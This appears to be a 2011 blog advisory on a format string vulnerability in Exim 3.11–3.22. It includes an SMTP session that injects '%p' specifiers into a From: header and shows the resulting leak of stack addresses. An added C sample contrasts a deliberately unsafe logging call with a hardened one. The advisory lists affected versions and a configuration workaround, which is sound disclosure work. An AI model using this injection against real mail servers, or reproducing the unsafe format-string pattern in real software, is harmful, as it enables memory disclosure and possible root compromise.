Saturday, 12 November 2011

Exim format string vulnerability lets remote attackers obtain system privileges

Details:

Exim (http://www.exim.org) is a widely used mail server that is included in many Linux versions. It provides mail transfer agent (MTA) functionality. It has been found to contain a format string vulnerability. If exim runs with root privileges, a remote attacker may be able to exploit this vulnerability to obtain system privileges.

Its configuration file is /etc/exim.conf. If the "headers_check_syntax" option is enabled, a format string in the host name part of the "From:" address of a message causes a format string overflow. An attacker can exploit this vulnerability to execute arbitrary code with root privileges on the affected machine. The following code is intended only for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.

Try this:

===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

..
===8<======8<=======8<=======

Somewhere in the answers you should see:

550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
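
Why the 550 response shows hex values instead of the literal %p text, as an added illustration of the bug class (not Exim's source and not part of the original post): text from the mail ends up in the format position of a printf-style call. The helper names log_write, report_unsafe and report_safe are hypothetical, and the sample address is constructed to match the From: value above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging helper (not an Exim function): like most variadic
 * log routines, it treats its third argument as a printf-style format. */
static void log_write(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}

/* VULNERABLE pattern: the message is built first and already contains text
 * taken from the mail header, then it is passed in the format position.
 * Any "%p" in the address is read as a conversion with no matching argument,
 * so the call prints whatever happens to sit on the stack. */
void report_unsafe(char *out, size_t n, const char *address)
{
    char msg[256];
    snprintf(msg, sizeof msg, "failing address is: %s", address);
    log_write(out, n, msg);            /* data used as format string */
}

/* HARDENED pattern: the format is a constant and the untrusted text is
 * only ever an argument, so conversion specifiers in it stay literal. */
void report_safe(char *out, size_t n, const char *address)
{
    log_write(out, n, "failing address is: %s", address);
}

int main(void)
{
    char out[256];
    /* Constructed sample input, same shape as the From: value above. */
    const char *from = "@@%p%p%p%p%p%p%p%p%p%p";

    report_safe(out, sizeof out, from);
    puts(out);                         /* the %p sequences come out as-is */

    /* report_unsafe() is exercised only with input that contains no '%'. */
    report_unsafe(out, sizeof out, "user@example.org");
    puts(out);
    return 0;
}
```

For input without '%' both functions produce the same line, which is why this pattern survives ordinary testing; compiling with -Wformat-security flags the direct form of the mistake.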


Affected systems:

University of Cambridge Exim 3.22
University of Cambridge Exim 3.21
University of Cambridge Exim 3.20
University of Cambridge Exim 3.19
University of Cambridge Exim 3.18
University of Cambridge Exim 3.17
University of Cambridge Exim 3.16
University of Cambridge Exim 3.15
University of Cambridge Exim 3.14
University of Cambridge Exim 3.13
University of Cambridge Exim 3.12
University of Cambridge Exim 3.11

Solution: Users should comment out "headers_check_syntax" in '/etc/exim.conf'.
